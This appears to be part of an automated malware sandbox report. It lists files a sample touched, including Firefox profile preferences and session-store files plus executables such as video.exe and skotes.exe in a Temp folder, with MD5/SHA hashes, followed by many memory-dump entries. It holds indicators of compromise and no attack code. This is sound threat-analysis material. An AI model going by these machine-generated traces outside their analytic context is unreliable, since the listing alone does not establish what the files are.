cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

Filesize
7KB

MD5
5a9271b0ac361d11a56418ace63fa364

SHA1
cd63692f35849ec29eb2eed9fecfc9255b11ead0

SHA256
c17833cffb1d7602673fa757b2f9c63f650a79e1607c10bd26f4ed746c1d471c

SHA512
4d3cfcbb24c77dce23bd694a0ecb1437b668e69b8100b3152e144bc4c059dd868e94609fce02c0464340f78c403c37b98f492ffbf31b36e986202f02d4d75483

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js

Filesize
6KB

MD5
482dee48a3a8d488239679daa4cae5ad

SHA1
0d15e2f09263b4b8193b9f7362abd16f0d9d9523

SHA256
31d39f31ddcc5f9470068679669428d2a935f24e0137019d48f3909c6418368e

SHA512
d4c198bd119519180d63bbb98d7027e24d4e54bda43dc95df8460e85f3b5265c856087500b886b2edc2e9df6456a99d55871c33615f9ba16fb41bdf8d2629979

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js

Filesize
6KB

MD5
2ce711b7300ebe9a1993b98352311b8d

SHA1
a5a34653d77b799df06cf3bed0205d2837ca9a86

SHA256
ac32b31624d12655dbee7077b1403a64990e83bbe6f50426a55a63896a9192cd

SHA512
5d27ec5033ba6449f35c2d8a849e48c553efe3377fbb95ece9c7ee015b8d24dca6190c3d01ca962b39b711d35d4459019137b24365ed0dfafaa6bac8f9f2c2c1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs.js

Filesize
6KB

MD5
58483dae989c88465563ebef6530850f

SHA1
6def354461b4951a6160fea4297d2ac000f68c1b

SHA256
ed3e635f11562c930b8ce8aec296d2acaae7da4672ade80137a0fbfa90290e8b

SHA512
eae0315ce79ccef79920e46678870e4fc4ad8c5a476df85b571b0c5767f39bb35e00a1f3d81959b8e1ca6809df60013db2cd80d3116a2553eae3154fcbdc44f5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
54808057518146dbb8b53ef5155e8dc1

SHA1
066e58761993845e07212693b6156ff69cffdfa2

SHA256
48ba57fc7e8aaeb5875bd1291b59f21fc60cbbbe1835bcc506af9bb710eac596

SHA512
00dfe0ad12a4dc800cae7c5fbf28211013ed39221bb57ed0f99f21f6b66c0b86cb8893bc281bd97fe338624c74531d6675c2590363c6dc3b229add95407bd0d5

Download Submit
\Users\Admin\AppData\Local\Temp\10000170101\video.exe

Filesize
1.7MB

MD5
e061f4dcbdbc33ec89ca73b7e617ba45

SHA1
6f90fa1041946bf00256b442ea6f1cc872ec5cf9

SHA256
d6db75a6d0b374773d3181419174070e855e7b754ffef8ea042ed4a5059f809d

SHA512
e882242104238eb01485aca6520f85fbaa227ce58e5b8d51614d1f7714f6e1ac9d5cf5addf2d73aab283e733d3c4fb5021973d507d589bcec8f8c5f9a84c8216

Download Submit
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Filesize
2.0MB

MD5
5f8da7bbdafaed3095a2fef9f7caf45c

SHA1
595731a346e573a217c1030789f8dbf930280dc7

SHA256
91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12

SHA512
f8a01fdb8ad387de77dd9937046f32841540740c418adf101de0029710e7af0b66ed0930f89bf9d1ee28c6b4f151c57bd5b9f512026e0f177fa63826d974ea11

Download Submit
memory/872-639-0x0000000000F10000-0x00000000013C4000-memory.dmp

Filesize
4.7MB

Download
memory/872-972-0x0000000000F10000-0x00000000013C4000-memory.dmp

Filesize
4.7MB

Download
memory/1156-442-0x0000000000320000-0x00000000007D4000-memory.dmp

Filesize
4.7MB

Download
memory/1156-458-0x0000000000320000-0x00000000007D4000-memory.dmp

Filesize
4.7MB

Download
memory/1156-459-0x0000000006D70000-0x0000000007224000-memory.dmp

Filesize
4.7MB

Download
memory/1580-807-0x0000000000E80000-0x0000000000EB0000-memory.dmp

Filesize
192KB

Download
memory/1668-122-0x000000013F230000-0x000000013F6EB000-memory.dmp

Filesize
4.7MB

Download
memory/1692-296-0x00000000000E0000-0x0000000000524000-memory.dmp

Filesize
4.3MB

Download
memory/1692-197-0x00000000000E0000-0x0000000000524000-memory.dmp

Filesize
4.3MB

Download
memory/1724-1919-0x00000000013C0000-0x00000000013F0000-memory.dmp

Filesize
192KB

Download
memory/1776-248-0x0000000000E50000-0x000000000114F000-memory.dmp

Filesize
3.0MB

Download
memory/1776-141-0x0000000000E50000-0x000000000114F000-memory.dmp

Filesize
3.0MB

Download
memory/2000-594-0x0000000000510000-0x0000000000536000-memory.dmp

Filesize
152KB

Download
memory/2000-593-0x0000000000980000-0x000000000101A000-memory.dmp

Filesize
6.6MB

Download
memory/2000-616-0x0000000000600000-0x0000000000606000-memory.dmp

Filesize
24KB

Download
memory/2000-606-0x00000000005B0000-0x00000000005CA000-memory.dmp

Filesize
104KB

Download
memory/2076-53-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-891-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1032-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1035-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1057-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1076-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1080-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1099-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1127-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1150-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-1154-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-864-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-47-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-60-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-59-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2076-57-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-51-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-992-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-845-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-55-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-826-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-45-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-63-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2076-49-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2116-88-0x0000000000960000-0x0000000000E15000-memory.dmp

Filesize
4.7MB

Download
memory/2116-100-0x0000000000960000-0x0000000000E15000-memory.dmp

Filesize
4.7MB

Download
memory/2372-1-0x0000000077C90000-0x0000000077C92000-memory.dmp

Filesize
8KB

Download
memory/2372-17-0x0000000000A70000-0x0000000000F24000-memory.dmp

Filesize
4.7MB

Download
memory/2372-18-0x0000000006F80000-0x0000000007434000-memory.dmp

Filesize
4.7MB

Download
memory/2372-5-0x0000000000A70000-0x0000000000F24000-memory.dmp

Filesize
4.7MB

Download
memory/2372-21-0x0000000006F80000-0x0000000007434000-memory.dmp

Filesize
4.7MB

Download
memory/2372-2-0x0000000000A71000-0x0000000000AD9000-memory.dmp

Filesize
416KB

Download
memory/2372-0-0x0000000000A70000-0x0000000000F24000-memory.dmp

Filesize
4.7MB

Download
memory/2372-3-0x0000000000A70000-0x0000000000F24000-memory.dmp

Filesize
4.7MB

Download
memory/2372-19-0x0000000000A71000-0x0000000000AD9000-memory.dmp

Filesize
416KB

Download
memory/2524-42-0x0000000000B00000-0x0000000000B4C000-memory.dmp

Filesize
304KB

Download
memory/2616-343-0x0000000001270000-0x0000000001572000-memory.dmp

Filesize
3.0MB

Download
memory/2616-524-0x0000000001270000-0x0000000001572000-memory.dmp

Filesize
3.0MB

Download
memory/2616-461-0x0000000001270000-0x0000000001572000-memory.dmp

Filesize
3.0MB

Download
memory/2708-106-0x0000000006E10000-0x00000000072C5000-memory.dmp

Filesize
4.7MB

Download
memory/2708-87-0x0000000006E10000-0x00000000072C5000-memory.dmp

Filesize
4.7MB

Download
memory/2708-626-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-460-0x00000000067F0000-0x0000000006AF2000-memory.dmp

Filesize
3.0MB

Download
memory/2708-105-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-456-0x00000000067F0000-0x0000000006AF2000-memory.dmp

Filesize
3.0MB

Download
memory/2708-440-0x0000000006E10000-0x00000000072C4000-memory.dmp

Filesize
4.7MB

Download
memory/2708-119-0x0000000006E10000-0x0000000007260000-memory.dmp

Filesize
4.3MB

Download
memory/2708-140-0x00000000067F0000-0x0000000006AEF000-memory.dmp

Filesize
3.0MB

Download
memory/2708-139-0x00000000067F0000-0x0000000006AEF000-memory.dmp

Filesize
3.0MB

Download
memory/2708-943-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-143-0x0000000006E10000-0x0000000007260000-memory.dmp

Filesize
4.3MB

Download
memory/2708-142-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-439-0x0000000006E10000-0x00000000072C4000-memory.dmp

Filesize
4.7MB

Download
memory/2708-22-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-23-0x00000000012C1000-0x0000000001329000-memory.dmp

Filesize
416KB

Download
memory/2708-196-0x0000000006E10000-0x0000000007254000-memory.dmp

Filesize
4.3MB

Download
memory/2708-414-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-1195-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-24-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-89-0x0000000006E10000-0x00000000072C5000-memory.dmp

Filesize
4.7MB

Download
memory/2708-26-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-194-0x0000000006E10000-0x0000000007254000-memory.dmp

Filesize
4.3MB

Download
memory/2708-70-0x00000000012C1000-0x0000000001329000-memory.dmp

Filesize
416KB

Download
memory/2708-69-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-225-0x00000000067F0000-0x0000000006AEF000-memory.dmp

Filesize
3.0MB

Download
memory/2708-27-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-258-0x00000000067F0000-0x0000000006AEF000-memory.dmp

Filesize
3.0MB

Download
memory/2708-62-0x00000000012C0000-0x0000000001774000-memory.dmp

Filesize
4.7MB

Download
memory/2708-342-0x00000000067F0000-0x0000000006AF2000-memory.dmp

Filesize
3.0MB

Download
memory/2708-341-0x00000000067F0000-0x0000000006AF2000-memory.dmp

Filesize
3.0MB

Download
memory/2708-403-0x0000000006E10000-0x0000000007254000-memory.dmp

Filesize
4.3MB

Download
memory/2928-980-0x0000000000400000-0x0000000000834000-memory.dmp

Filesize
4.2MB

Download
memory/2952-717-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-186-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-121-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-249-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-468-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-979-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/2952-1237-0x0000000000400000-0x0000000000850000-memory.dmp

Filesize
4.3MB

Download
memory/3000-623-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3000-1575-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3000-625-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/3000-617-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3000-621-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3000-619-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3352-1196-0x0000000000290000-0x00000000005B0000-memory.dmp

Filesize
3.1MB

Download
memory/3460-1149-0x0000000000010000-0x00000000006B5000-memory.dmp

Filesize
6.6MB

Download
memory/3464-1899-0x0000000001220000-0x00000000018BA000-memory.dmp

Filesize
6.6MB

Download
memory/3556-1877-0x0000000000AC0000-0x000000000115A000-memory.dmp

Filesize
6.6MB

Download
memory/3596-1151-0x0000000001000000-0x00000000014AD000-memory.dmp

Filesize
4.7MB

Download
memory/3704-973-0x0000000000B00000-0x0000000000F66000-memory.dmp

Filesize
4.4MB

Download
memory/3704-974-0x0000000000B00000-0x0000000000F66000-memory.dmp

Filesize
4.4MB

Download